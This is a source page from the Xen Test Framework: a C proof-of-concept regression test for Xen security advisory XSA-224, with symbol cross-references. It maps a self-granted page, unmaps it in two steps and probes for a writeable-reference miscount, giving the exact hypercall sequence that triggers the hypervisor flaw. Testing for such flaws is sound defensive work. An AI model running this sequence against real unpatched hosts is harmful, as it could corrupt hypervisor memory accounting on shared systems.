Xen Test Framework
tests
xsa-224
main.c
#include <xtf.h>
/* Title string for this test: the XSA-224 proof-of-concept / regression check. */
const char test_title[] = "XSA-224 PoC";
/*
 * One page of guest memory used as the test subject.  test_main() grants it
 * to its own domain, maps and unmaps it, then asks Xen to pin it as an L1
 * pagetable.  Placement comes from __page_aligned_bss (per its name, a
 * page-aligned .bss object), so the buffer covers exactly one frame.
 */
static uint8_t frame[PAGE_SIZE] __page_aligned_bss;
/**
 * XSA-224 regression check.
 *
 * Detects whether the running Xen drops too many writeable references from a
 * page when a grant that was mapped with both host and device flags is
 * unmapped in two separate steps.
 *
 * The steps are order-dependent:
 *  1. Publish v1 grant entry 8 for frame[], granted to our own domain.
 *  2. Map that grant once with GNTMAP_host_map | GNTMAP_device_map.
 *  3. Unmap the host mapping alone, then the device mapping alone.
 *  4. Try to pin frame[] as an L1 pagetable and classify the result.
 *
 * The verdict is reported via xtf_failure() (vulnerable), xtf_success()
 * (not vulnerable) or xtf_error() (setup problem or unexpected result).
 *
 * NOTE(review): the hypercall wrappers are declared as returning long; the
 * results are held in an int here, as in the original code.
 * NOTE(review): the early-exit paths leave the grant entry and any mapping
 * in place; presumably fine because the test domain is discarded afterwards
 * - confirm.
 */
void test_main(void)
{
    /* Grant reference used throughout; the error strings below name it too. */
    const unsigned int gref = 8;

    /* Version 1 grant table, matching the gnttab_v1[] accesses below. */
    int ret = xtf_init_grant_table(1);

    if ( ret )
    {
        xtf_error("Error initialising grant table: %d\n", ret);
        return;
    }

    int self_id = xtf_get_domid();

    if ( self_id < 0 )
    {
        xtf_error("Error getting domid\n");
        return;
    }

    /*
     * Fill in the grant entry so that frame[] can be mapped by ourselves.
     * The flags are written last, after the write barrier, so the entry only
     * becomes valid once domid and frame are already in place.
     */
    gnttab_v1[gref].domid = self_id;
    gnttab_v1[gref].frame = virt_to_gfn(frame);
    smp_wmb();
    gnttab_v1[gref].flags = GTF_permit_access;

    struct gnttab_map_grant_ref map_op = {
        .host_addr = KB(4),
        .flags = GNTMAP_host_map | GNTMAP_device_map,
        .ref = gref,
        .dom = self_id,
        .dev_bus_addr = KB(4),
    };

    /* A single map request creates both the host and the device mapping. */
    ret = hypercall_grant_table_op(GNTTABOP_map_grant_ref, &map_op, 1);
    if ( ret || map_op.status )
    {
        xtf_error("Error: Unable to map grant[8]: %d/%d\n",
                  ret, map_op.status);
        return;
    }

    struct gnttab_unmap_grant_ref unmap_op = {
        .host_addr = KB(4),
        .handle = map_op.handle,
    };

    /* First unmap: only the host mapping (dev_bus_addr is left at zero). */
    ret = hypercall_grant_table_op(GNTTABOP_unmap_grant_ref, &unmap_op, 1);
    if ( ret || unmap_op.status )
    {
        xtf_error("Error: Unable to host unmap grant[8]: %d/%d\n",
                  ret, unmap_op.status);
        return;
    }

    /* Second unmap: only the device mapping, reusing the same handle. */
    unmap_op.host_addr = 0;
    unmap_op.dev_bus_addr = virt_to_maddr(frame);

    ret = hypercall_grant_table_op(GNTTABOP_unmap_grant_ref, &unmap_op, 1);
    if ( ret || unmap_op.status )
    {
        xtf_error("Error: Unable to bus unmap grant[8]: %d/%d\n",
                  ret, unmap_op.status);
        return;
    }

    /*
     * A Xen vulnerable to XSA-224 has by now dropped one writeable reference
     * too many from frame[].  Probe for that by asking Xen to pin the page
     * as an L1 pagetable: frame[] is ordinary writeable test memory, so a
     * fixed Xen is expected to refuse with -EINVAL, and an accepted pin
     * shows the reference accounting is wrong.
     */
    mmuext_op_t pin = {
        .cmd = MMUEXT_PIN_L1_TABLE,
        .arg1.mfn = virt_to_mfn(frame),
    };

    ret = hypercall_mmuext_op(&pin, 1, NULL, DOMID_SELF);

    if ( ret == 0 )
        xtf_failure("Fail: Vulnerable to XSA-224\n");
    else if ( ret == -EINVAL )
        xtf_success("Success: Not vulnerable to XSA-224\n");
    else
        /* Any other code says nothing either way, so report an error. */
        xtf_error("Unexpected MMUEXT_PIN_L1_TABLE rc %d\n", ret);
}
/*
 * Local variables:
 * mode: C
 * c-file-style: "BSD"
 * c-basic-offset: 4
 * tab-width: 4
 * indent-tabs-mode: nil
 * End:
 */
smp_wmb
#define smp_wmb()
Definition:
barrier.h:36
gnttab_v1
grant_entry_v1_t gnttab_v1[]
xtf_init_grant_table
int xtf_init_grant_table(unsigned int version)
Initialise XTF's grant infrastructure.
Definition:
grant_table.c:21
__page_aligned_bss
#define __page_aligned_bss
Definition:
compiler.h:37
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:110
test_title
const char test_title[]
The title of the test.
Definition:
main.c:24
EINVAL
#define EINVAL
Definition:
errno.h:33
hypercall_mmuext_op
static long hypercall_mmuext_op(const mmuext_op_t ops[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition:
hypercall.h:148
hypercall_grant_table_op
static long hypercall_grant_table_op(unsigned int cmd, void *args, unsigned int count)
Definition:
hypercall.h:131
xtf_get_domid
int xtf_get_domid(void)
Obtain the current domid.
Definition:
lib.c:47
virt_to_mfn
unsigned long virt_to_mfn(const void *va)
virt_to_maddr
uint64_t virt_to_maddr(const void *va)
virt_to_gfn
static unsigned long virt_to_gfn(const void *va)
Definition:
mm.h:100
KB
#define KB(num)
Express num in Kilobytes.
Definition:
numbers.h:23
PAGE_SIZE
#define PAGE_SIZE
Definition:
page.h:11
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition:
report.c:94
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition:
report.c:80
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38
NULL
#define NULL
Definition:
stddef.h:12
uint8_t
__UINT8_TYPE__ uint8_t
Definition:
stdint.h:14
gnttab_map_grant_ref
Definition:
grant_table.h:224
gnttab_map_grant_ref::status
int16_t status
Definition:
grant_table.h:231
gnttab_map_grant_ref::handle
grant_handle_t handle
Definition:
grant_table.h:232
gnttab_map_grant_ref::host_addr
uint64_t host_addr
Definition:
grant_table.h:226
gnttab_unmap_grant_ref
Definition:
grant_table.h:248
gnttab_unmap_grant_ref::status
int16_t status
Definition:
grant_table.h:254
gnttab_unmap_grant_ref::host_addr
uint64_t host_addr
Definition:
grant_table.h:250
gnttab_unmap_grant_ref::dev_bus_addr
uint64_t dev_bus_addr
Definition:
grant_table.h:251
grant_entry_v1_t::flags
uint16_t flags
Definition:
grant_table.h:108
grant_entry_v1_t::frame
uint32_t frame
Definition:
grant_table.h:117
grant_entry_v1_t::domid
domid_t domid
Definition:
grant_table.h:110
mmuext_op
Definition:
xen.h:355
mmuext_op::cmd
unsigned int cmd
Definition:
xen.h:356
GNTTABOP_map_grant_ref
#define GNTTABOP_map_grant_ref
Definition:
grant_table.h:223
GNTMAP_host_map
#define GNTMAP_host_map
Definition:
grant_table.h:179
GNTMAP_device_map
#define GNTMAP_device_map
Definition:
grant_table.h:176
GTF_permit_access
#define GTF_permit_access
Definition:
grant_table.h:50
GNTTABOP_unmap_grant_ref
#define GNTTABOP_unmap_grant_ref
Definition:
grant_table.h:247
MMUEXT_PIN_L1_TABLE
#define MMUEXT_PIN_L1_TABLE
Definition:
xen.h:333
DOMID_SELF
#define DOMID_SELF
Definition:
xen.h:70
frame
static uint8_t frame[PAGE_SIZE]
Definition:
main.c:23